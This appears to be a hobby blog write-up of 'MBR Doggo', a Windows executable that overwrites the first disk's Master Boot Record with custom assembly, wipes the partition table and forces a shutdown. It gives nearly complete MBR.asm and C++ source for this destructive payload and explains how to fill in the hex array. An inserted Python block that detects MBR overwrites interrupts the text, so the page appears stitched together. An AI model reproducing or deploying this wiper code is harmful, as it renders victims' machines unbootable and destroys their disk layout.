MBR Doggo
MBR Doggo is a small Windows executable that overwrites your Master Boot Record with custom assembly code, thus stopping Windows from booting and running my own assembly code instead.
The MBR has a maximum size of 512 bytes and is located at the very beginning of the disk. The BIOS reads these 512 bytes and checks whether the last two bytes are set to 0xAA55 (the standard boot signature). If they are, the BIOS executes the code stored in the first 512 bytes of the disk; if they are not, the BIOS moves on to the next boot device (USB stick, DVD drive, etc.).
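To make the layout described above concrete from the defender's side, here is an added example (not part of the MBR Doggo project) that parses a 512-byte sector the way the BIOS would look at it: it checks the 0xAA55 signature at bytes 510-511, decodes the four 16-byte partition entries at byte 446, and flags the tell-tale signs of a whole-sector overwrite (valid signature but empty partition table, boot code that no longer matches a recorded baseline, unexpected printable strings). The two sample sectors are constructed inline; the "doggo" one is built from the first bytes of the page's own payload plus its message string, the "good" one is a made-up stub with a single NTFS partition entry.

```python
"""Inspect a raw MBR sector and report signs of an overwrite.

Added example for illustration; it is not code from the MBR Doggo project.
It assumes the sector has already been read into a bytes object (for
instance from a backup image taken while the machine was known-good).
"""
import hashlib
import re
import struct

SECTOR_SIZE = 512
BOOT_CODE_END = 446           # bytes 0..445 hold the boot code
PARTITION_TABLE_OFF = 446     # four 16-byte partition entries follow
BOOT_SIGNATURE = b"\x55\xAA"  # 0xAA55 stored little-endian at bytes 510..511


def parse_mbr(sector: bytes) -> dict:
    """Return signature status, partition entries and a hash of the boot code."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError(f"expected {SECTOR_SIZE} bytes, got {len(sector)}")
    partitions = []
    for i in range(4):
        off = PARTITION_TABLE_OFF + 16 * i
        # status(1) CHS-start(3, skipped) type(1) CHS-end(3, skipped) LBA(4) count(4)
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", sector, off)
        partitions.append({"status": status, "type": ptype,
                           "lba_start": lba_start, "sectors": sectors})
    return {
        "signature_ok": sector[510:512] == BOOT_SIGNATURE,
        "partitions": partitions,
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_END]).hexdigest(),
    }


def extract_strings(sector: bytes, min_len: int = 8) -> list:
    """Printable ASCII runs inside the boot-code area, for an analyst to eyeball."""
    return [m.decode("ascii") for m in
            re.findall(rb"[\x20-\x7e]{%d,}" % min_len, sector[:BOOT_CODE_END])]


def assess_mbr(sector: bytes, baseline_boot_code_sha256: str = None) -> list:
    """Return a list of findings; an empty list means nothing looked wrong."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature missing: BIOS will skip this disk")
    if not any(p["type"] for p in info["partitions"]):
        findings.append("partition table is empty: a full 512-byte overwrite "
                        "clobbers the table along with the boot code")
    if baseline_boot_code_sha256 and info["boot_code_sha256"] != baseline_boot_code_sha256:
        findings.append("boot code differs from recorded baseline")
    return findings


# --- constructed samples -------------------------------------------------
# A made-up "healthy" sector: short stub (cli; xor ax,ax; mov ss,ax), one
# active NTFS (0x07) partition starting at LBA 2048, three empty entries.
GOOD_MBR = (
    b"\xfa\x33\xc0\x8e\xd0".ljust(BOOT_CODE_END, b"\x00")
    + struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07, b"\xfe\xff\xff", 2048, 204800)
    + b"\x00" * 48
    + BOOT_SIGNATURE
)

# The page's payload: its first instructions (mov ax,07C0h / add ax,288 /
# mov ss,ax / mov sp,4096) followed by its message, zero-padded, signed.
DOGGO_MBR = (
    bytes.fromhex("B8C0070520018ED0BC0010")
    + b"You have been visited by the MBR doggo\r\nSleep tite Windows.\x00"
).ljust(510, b"\x00") + BOOT_SIGNATURE


if __name__ == "__main__":
    good = parse_mbr(GOOD_MBR)
    for name, sector in (("good", GOOD_MBR), ("doggo", DOGGO_MBR)):
        print(name, assess_mbr(sector, good["boot_code_sha256"]) or "no findings")
        print("  strings:", extract_strings(sector))
```

The check that matters most is the empty partition table: the payload's `times 510-($-$$) db 0` pads everything up to the signature, so bytes 446-509 are zeroed and the disk's partition layout is gone even though the signature still validates. Comparing the boot-code hash against a baseline taken from a known-good image catches quieter rewrites that keep the table intact.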
Assembly
On a normal, working Windows installation the MBR contains, for example, code that tells the BIOS to start loading code from part XXX of the disk, which in turn starts loading the OS.
In our case Windows never gets a chance to load, because the MBR has been overwritten with a small piece of code that displays an on-screen message and then drops into an infinite loop.
MBR.asm

```nasm
BITS 16

start:
    mov ax, 07C0h           ; the BIOS loads us at 0x7C00 (segment 07C0h)
    add ax, 288             ; place the stack 4 KiB past the 512-byte sector
    mov ss, ax
    mov sp, 4096

    mov ax, 07C0h           ; data segment = our own sector, so text_string resolves
    mov ds, ax

    mov si, text_string     ; DS:SI points at the message
    call print_string

    jmp $                   ; hang forever; Windows never loads

text_string db 'You have been visited by the MBR doggo',13,10,'Sleep tite Windows.',0

print_string:               ; BIOS teletype output, one byte at a time
    mov ah, 0Eh             ; INT 10h function 0Eh: write character
.repeat:
    lodsb                   ; AL = [DS:SI], SI++
    cmp al, 0               ; NUL terminator ends the string
    je .done
    int 10h
    jmp .repeat
.done:
    ret

times 510-($-$$) db 0       ; Pad remainder of boot sector with 0s
dw 0xAA55                   ; The standard PC boot signature
```
Now if we write the assembled binary to the boot sector of a USB drive and try booting from it using QEMU, we get the following results:
Great! Now that we know it works, we can start writing the C++ program that will be used to overwrite the boot sector.
MBRDoggo.cpp

```cpp
#include <windows.h>
#include <conio.h>
#include <stdio.h>
#include <stdlib.h>

void ripMBR() {
    DWORD write;
    // MBR payload: the assembled 512-byte boot sector as a comma-separated hex array
    char data[] = { (INSERT HEX MBR PAYLOAD HERE) };

    // Open the first physical disk for raw access (requires administrator rights)
    HANDLE disk = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
    // Write the whole first sector, replacing boot code and partition table alike
    WriteFile(disk, data, 512, &write, NULL);
    CloseHandle(disk);

    //MessageBox(0, "Thanks for using MBR doggo!", "Sleep Tite", MB_ICONWARNING);
    system("shutdown -s -t 0");
}

int main() {
    ripMBR();
    return 0;
}
```
The Payload
I converted the MBR binary we just built into a comma-separated hex string and stored it inside an array. Of course you could read the binary from an external file instead, but I wanted to keep everything simple and inside a single .exe, and this is my way of doing so.
Example conversion
0xB8,0xC0,0x07,0x05,0x20,0x01,0x8E,0xD0,0xBC, (You get the idea)
That's about it, really. Now if you run this .exe it will overwrite your MBR and reboot the computer, rendering it useless.